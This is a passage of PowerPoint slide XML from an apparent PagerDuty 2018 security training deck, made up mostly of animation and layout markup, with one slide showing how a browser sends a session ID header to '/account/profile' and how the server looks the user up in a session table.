                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2172"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetClass="entr" nodeType="afterEffect" presetSubtype="4" presetID="22" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(down)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2167"/>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ID="10" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2157"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2157"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2165"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2165"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="216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ID="10" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2162"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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62" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2164" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2163" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2152" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2167" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2165" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2166" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2157" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2172" grpId="4"/>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9"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350" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="[ REDACTED ]"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411888" y="5935662"/>
            <a:ext cx="9560224" cy="184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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>[ REDACTED ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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76" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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177"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178" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2179" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2180" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233227" y="4678461"/>
            <a:ext cx="4158788" cy="4158788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2181" name="www.png" descr="www.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15978244" y="4678461"/>
            <a:ext cx="4158789" cy="4158788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2182" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8798880" y="5632714"/>
            <a:ext cx="6772500" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2183" name="x-pd-session: dh46gs…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9346660" y="5873121"/>
            <a:ext cx="4691795"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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>x-pd-session: dh46gs…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2184" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="17801510" y="2893220"/>
          <a:ext cx="6106572" cy="2312880"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="0" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2850790"/>
                <a:gridCol w="3243081"/>
              </a:tblGrid>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>session_id</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:solidFill>
                      <a:srgbClr val="25C151"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>user</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:solidFill>
                      <a:srgbClr val="25C151"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="454545"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>dh46gs..</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="454545"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>bob</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400">
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ht65yw..</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400">
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>rich</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400">
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>j83gsd..</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400">
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>tim</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="460035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400">
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>4tdb5t..</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400">
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>arup</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="606060"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2185" name="/account/profile"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9337491" y="4612135"/>
            <a:ext cx="3370462"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3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>/account/profile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2186" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8798880" y="7689082"/>
            <a:ext cx="6772500" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2187" name="Bob’s Profile"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12504585" y="7846747"/>
            <a:ext cx="2572011"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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Bob’s Profile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2192" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2302456" y="1935321"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2188" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2189" name="Can you show me my profile?…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Can you show me my profile?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Here’s that ID you gave me earlier.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2190" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2191" name="1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2197" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15900094" y="6013969"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2193" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
